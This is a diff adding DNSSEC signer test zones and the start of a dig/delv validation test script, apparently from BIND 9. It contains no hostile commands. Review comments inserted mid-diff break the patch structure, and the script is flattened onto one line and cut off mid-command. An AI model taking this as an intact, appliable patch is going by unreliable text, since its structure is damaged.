+; have existing private key files available. The third is a KSK.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+18240.key
+$include Kexample.com.+010+28633.key
+$include bogus-ksk.key
diff --git a/bin/tests/system/dnssec/signer/general/test6.zone b/bin/tests/system/dnssec/signer/general/test6.zone
new file mode 100644
index 0000000..fcfb1ec
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test6.zone
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has four DNSKEY records, two (KK + ZSK) of which
+; have existing private key files available. There are also a KSK and ZSK
+; for which there will be no signatures.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+18240.key
+$include Kexample.com.+010+28633.key
+$include bogus-ksk.key
+$include bogus-zsk.key
diff --git a/bin/tests/system/dnssec/signer/general/test7.zone b/bin/tests/system/dnssec/signer/general/test7.zone
new file mode 100644
index 0000000..e52c535
--- /dev/null
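Review bot: The header comment of test6.zone says `two (KK + ZSK)`; it should read `two (KSK + ZSK)`, matching the wording used in test4.zone. test5.zone, in the hunk just before it, has the related spacing slip `(KSK +ZSK)`, which should be `(KSK + ZSK)` as well. Since these comments are the only description of what each signer test case expects, they are worth getting exact.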
+++ b/bin/tests/system/dnssec/signer/general/test7.zone
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has two DNSKEY records, none of which have
+; existing private key files available. The resulting zone should fail
+; the consistency tests.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include bogus-ksk.key
+$include bogus-zsk.key
diff --git a/bin/tests/system/dnssec/signer/general/test8.zone b/bin/tests/system/dnssec/signer/general/test8.zone
new file mode 100644
index 0000000..893d32d
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test8.zone
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has two DNSKEY records, one of which,
+; the KSK, has a private key. The resulting zone should be rejected as
+; it has no ZSK signatures.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+010+28633.key
+$include bogus-zsk.key
diff --git a/bin/tests/system/dnssec/signer/general/test9.zone b/bin/tests/system/dnssec/signer/general/test9.zone
new file mode 100644
index 0000000..14c47d0
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/general/test9.zone
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; This is a zone which has two DNSKEY records, both of which have
+; existing private key files available. They should be loaded automatically
+; and the zone correctly signed.
+;
+$TTL 3600
+example.com. IN SOA ns hostmaster 00090000 1200 3600 604800 300
+$include Kexample.com.+008+63613.key
+$include Kexample.com.+008+15002.key
diff --git a/bin/tests/system/dnssec/signer/prepub.db.in b/bin/tests/system/dnssec/signer/prepub.db.in
new file mode 100644
index 0000000..946aac1
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/prepub.db.in
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+prepub. 60 IN SOA prepub. . 0 0 0 0 0
+prepub. 60 IN NS prepub.
+prepub. 60 IN A 1.2.3.4
+; out of zone record
+out-of-zone. 60 IN A 1.2.3.4
diff --git a/bin/tests/system/dnssec/signer/remove.db.in b/bin/tests/system/dnssec/signer/remove.db.in
new file mode 100644
index 0000000..5629a42
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/remove.db.in
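Review bot: test9.zone's header comment is word for word the one in test1.zone, although this zone includes the `+008+` keys (63613 and 15002) where test1.zone includes the `+010+` pair. The comment should say what this case adds, e.g. `; Same as test1.zone but with the algorithm 8 (RSASHA256) key pair.`, so a reader does not take the file for a duplicate. Without that, the reason the RSASHA256 keys exist in `signer/general/` is visible only from the `$include` lines.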
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+remove. 60 IN SOA remove. . 0 0 0 0 0
+remove. 60 IN NS remove.
+remove. 60 IN A 1.2.3.4
+remove. 60 IN AAAA ::ffff:1.2.3.4
+remove. 60 IN MX 0 remove.
+$INCLUDE remove.db.signed
diff --git a/bin/tests/system/dnssec/signer/remove2.db.in b/bin/tests/system/dnssec/signer/remove2.db.in
new file mode 100644
index 0000000..b2962b9
--- /dev/null
+++ b/bin/tests/system/dnssec/signer/remove2.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+remove. 60 IN SOA remove. . 0 0 0 0 0
+remove. 60 IN NS remove.
+remove. 60 IN A 1.2.3.4
+$INCLUDE remove.db.signed
diff --git a/bin/tests/system/dnssec/tests.sh b/bin/tests/system/dnssec/tests.sh
new file mode 100644
index 0000000..64927f3
--- /dev/null
+++ b/bin/tests/system/dnssec/tests.sh
@@ -0,0 +1,4441 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=1 + +rm -f dig.out.* + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +dig_with_additionalopts() { + "$DIG" +noall +additional +dnssec -p "$PORT" "$@" +} + +dig_with_answeropts() { + "$DIG" +noall +answer +dnssec -p "$PORT" "$@" +} + +delv_with_opts() { + "$DELV" -a ns1/trusted.conf -p "$PORT" "$@" +} + +rndccmd() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "$CONTROLPORT" -s "$@" +} + +# TODO: Move loadkeys_on to conf.sh.common +dnssec_loadkeys_on() { + nsidx=$1 + zone=$2 + nextpart ns${nsidx}/named.run > /dev/null + rndccmd 10.53.0.${nsidx} loadkeys ${zone} | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "next key event" ns${nsidx}/named.run || return 1 +} + +# convert private-type records to readable form +showprivate () { + echo "-- $* --" + dig_with_opts +nodnssec +short "@$2" -t type65534 "$1" | cut -f3 -d' ' | + while read -r record; do + # shellcheck disable=SC2016 + $PERL -e 'my $rdata = pack("H*", @ARGV[0]); + die "invalid record" unless length($rdata) == 5; + my ($alg, $key, $remove, $complete) = unpack("CnCC", $rdata); + my $action = "signing"; + $action = "removing" if $remove; + my $state = " (incomplete)"; + $state = " (complete)" if $complete; + print ("$action: alg: $alg, key: $key$state\n");' "$record" + done +} + +# check that signing records are marked as complete +checkprivate () { + for i in 1 2 3 4 5 6 7 8 9 10; do + showprivate "$@" | grep -q 
incomplete || return 0 + sleep 1 + done + echo_d "$1 signing incomplete" + return 1 +} + +# check that a zone file is raw format, version 0 +israw0 () { + # shellcheck disable=SC2016 + < "$1" $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 2 || $version != 0);' + return $? +} + +# check that a zone file is raw format, version 1 +israw1 () { + # shellcheck disable=SC2016 + < "$1" $PERL -e 'binmode STDIN; + read(STDIN, $input, 8); + ($style, $version) = unpack("NN", $input); + exit 1 if ($style != 2 || $version != 1);' + return $? +} + +# strip NS and RRSIG NS from input +stripns () { + awk '($4 == "NS") || ($4 == "RRSIG" && $5 == "NS") { next} { print }' "$1" +} + +# +# Ensure there is not multiple consecutive blank lines. +# Ensure there is a blank line before "Start view" and +# "Negative trust anchors:". +# Ensure there is not a blank line before "Secure roots:". +# +check_secroots_layout () { + tr -d '\r' < "$1" | \ + awk '$0 == "" { if (empty) exit(1); empty=1; next } + /Start view/ { if (!empty) exit(1) } + /Secure roots:/ { if (empty) exit(1) } + /Negative trust anchors:/ { if (!empty) exit(1) } + { empty=0 }' + return $? +} + +# Check that for a query against a validating resolver where the +# authoritative zone is unsigned (insecure delegation), glue is returned +# in the additional section +echo_i "checking that additional glue is returned for unsigned delegation ($n)" +ret=0 +$DIG +tcp +dnssec -p "$PORT" a.insecure.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ns\\.insecure\\.example\\..*A.10\\.53\\.0\\.3" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Check the example. domain + +echo_i "checking that zone transfer worked ($n)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + dig_with_opts a.example. 
@10.53.0.2 a > dig.out.ns2.test$n || ret=1 + dig_with_opts a.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns2.test$n dig.out.ns3.test$n > /dev/null || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +digcomp dig.out.ns2.test$n dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# test AD bit: +# - dig +adflag asks for authentication (ad in response) +echo_i "checking AD bit asking for validation ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth +noadd +nodnssec +adflag a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# test AD bit: +# - dig +noadflag +echo_i "checking that AD is not set without +adflag or +dnssec ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +noadflag a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth +noadd +nodnssec +noadflag a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking for AD in authoritative answer ($n)" +ret=0 +dig_with_opts a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation NSEC ($n)" +ret=0 +dig_with_opts +noauth a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth a.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that 'example/DS' from the referral was used in previous validation ($n)" +ret=0 +grep "query 'example/DS/IN' approved" ns1/named.run > /dev/null && ret=1 +grep "fetch: example/DS" ns4/named.run > /dev/null && ret=1 +grep "validating example/DS: starting" ns4/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive validation NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.example > delv.out$n || ret=1 + grep "a.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + grep "a.example..*.RRSIG.A [0-9][0-9]* 2 300 .*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + ret=0 + echo_i "checking positive validation NSEC using dns_client (trusted-keys) ($n)" + "$DELV" -a ns1/trusted.keys -p "$PORT" @10.53.0.4 a a.example > delv.out$n || ret=1 + grep "a.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + grep "a.example..*.RRSIG.A [0-9][0-9]* 2 300 .*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive validation NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive validation NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.nsec3.example > delv.out$n || ret=1 + grep "a.nsec3.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + grep "a.nsec3.example..*RRSIG.A [0-9][0-9]* 3 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive validation OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +SP="[[:space:]]+" + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive validation OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.optout.example > delv.out$n || ret=1 + grep -Eq "^a\\.optout\\.example\\.""$SP""[0-9]+""$SP""IN""$SP""A""$SP""10.0.0.1" delv.out$n || ret=1 + grep -Eq "^a\\.optout\\.example\\.""$SP""[0-9]+""$SP""IN""$SP""RRSIG""$SP""A""$SP""$DEFAULT_ALGORITHM_NUMBER""$SP""3""$SP""300" delv.out$n || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive wildcard validation NSEC ($n)" +ret=0 +dig_with_opts a.wild.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts a.wild.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1 +stripns dig.out.ns3.test$n > dig.out.ns3.stripped.test$n +stripns dig.out.ns4.test$n > dig.out.ns4.stripped.test$n +digcomp dig.out.ns3.stripped.test$n dig.out.ns4.stripped.test$n || ret=1 +grep "\\*\\.wild\\.example\\..*RRSIG NSEC" dig.out.ns4.test$n > /dev/null || ret=1 +grep "\\*\\.wild\\.example\\..*NSEC z\\.example" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive wildcard validation NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.wild.example > delv.out$n || ret=1 + grep "a.wild.example..*10.0.0.27" delv.out$n > /dev/null || ret=1 + grep -E "a.wild.example..*RRSIG.A [0-9]+ 2 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive wildcard answer NSEC3 ($n)" +ret=0 +dig_with_opts a.wild.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "AUTHORITY: 4," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive wildcard answer NSEC3 ($n)" +ret=0 +dig_with_opts a.wild.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "AUTHORITY: 4," dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive wildcard validation NSEC3 ($n)" +ret=0 +dig_with_opts a.wild.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts a.wild.nsec3.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1 +stripns dig.out.ns3.test$n > dig.out.ns3.stripped.test$n +stripns dig.out.ns4.test$n > dig.out.ns4.stripped.test$n +digcomp dig.out.ns3.stripped.test$n dig.out.ns4.stripped.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive wildcard validation NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.wild.nsec3.example > delv.out$n || ret=1 + grep -E "a.wild.nsec3.example..*10.0.0.6" delv.out$n > /dev/null || ret=1 + grep -E "a.wild.nsec3.example..*RRSIG.A [0-9][0-9]* 3 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking positive wildcard validation OPTOUT ($n)" +ret=0 +dig_with_opts a.wild.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts a.wild.optout.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +stripns dig.out.ns3.test$n > dig.out.ns3.stripped.test$n +stripns dig.out.ns4.test$n > dig.out.ns4.stripped.test$n +digcomp dig.out.ns3.stripped.test$n dig.out.ns4.stripped.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive wildcard validation OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.wild.optout.example > delv.out$n || ret=1 + grep "a.wild.optout.example..*10.0.0.6" delv.out$n > /dev/null || ret=1 + grep "a.wild.optout.example..*RRSIG.A [0-9][0-9]* 3 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NXDOMAIN NSEC ($n)" +ret=0 +dig_with_opts +noauth q.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth q.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NXDOMAIN NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NXDOMAIN NSEC3 ($n)" +ret=0 +dig_with_opts +noauth q.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth q.nsec3.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NXDOMAIN NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NXDOMAIN OPTOUT ($n)" +ret=0 +dig_with_opts +noauth q.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth q.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NXDOMAIN OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.optout.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NODATA NSEC ($n)" +ret=0 +dig_with_opts +noauth a.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth a.example. 
@10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NODATA OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 txt a.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NODATA NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NODATA NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 txt a.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NODATA OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. 
\ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NODATA OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 txt a.optout.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative wildcard validation NSEC ($n)" +ret=0 +dig_with_opts b.wild.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +dig_with_opts b.wild.example. @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative wildcard validation NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 txt b.wild.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative wildcard validation NSEC3 ($n)" +ret=0 +dig_with_opts b.wild.nsec3.example. @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts b.wild.nsec3.example. 
@10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative wildcard validation NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 txt b.wild.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative wildcard validation OPTOUT ($n)" +ret=0 +dig_with_opts b.wild.optout.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts b.wild.optout.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > 